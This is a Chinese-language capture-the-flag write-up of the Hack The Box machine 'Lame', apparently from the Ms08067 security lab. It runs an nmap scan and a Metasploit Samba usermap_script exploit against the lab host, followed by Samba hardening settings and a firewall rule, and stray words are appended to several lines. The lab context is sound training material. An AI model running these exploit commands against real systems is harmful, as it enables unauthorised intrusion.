本文做者:shavchen安全
此次挑戰的靶機是Lame,距今900天+,歷史感十足網絡
靶機描述
Lame is a beginner level machine, requiring only one exploit to obtain root access.
It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.tcp
技能收穫:Smaba漏洞利用ide
基本信息
Kali ip :10.10.14.3
Lameip:10.10.10.3測試
通訊正常,延時偏高網站
端口掃描ui
nmap -sV -A -p- 10.10.10.3
啊,Sambablog
靶機開啓了Smaba服務,那還有什麼好說的接口
search Samba
選擇exploit/multi/samba/usermap_script網絡安全
use exploit/multi/samba/usermap_script set rhosts 10.10.10.3 exploit
emem,至此完成?靶機簡單,那咱們加固一下吧
查看samba版本
修改配置文件,位置:/etc/samba/smb.conf
#加入參數 encrypt passwords=yes smb passwd file=/etc/samba/smbpasswd
這樣,當security=user時,經過/etc/samba/smbpasswd文件進行驗證,驗證過程無明碼傳輸
不使用共享級別的安全
當security=share的時候,samba安全性比較差,靈活性不強,因此應避免使用共享級別安全
限制網絡接口訪問
這個適用於多網卡用戶,限制samba只響應來自內網的用戶請求
interfaces=192.168.1.1/24 127.0.0.1 bind interfaces only=yes
#ip控制 hosts deny=ALL hosts allow=192.168.1.0/24 127.0.0.1 #主機控制 hosts deny=ALL hosts allow=win01,win02,win05 #用戶控制,容許用戶smb01,smb02與組samba,admin訪問 valid users=smb01,smb02,@samba@admin
iptables -t filter -A INPUT -p tcp --dport 139 -j DROP
apt-get install samba
轉載請聯繫做者並註明出處!
Ms08067安全實驗室專一於網絡安全知識的普及和培訓。團隊已出版《Web安全***:***測試實戰指南》,《內網安全***:***測試實戰指南》,《Python安全***:***測試實戰指南》,《Java代碼安全審計(入門篇)》等書籍。團隊按期分享關於CTF靶場、內網***、APT方面技術乾貨,從零開始、以實戰落地爲主官方網站:https://www.ms08067.com/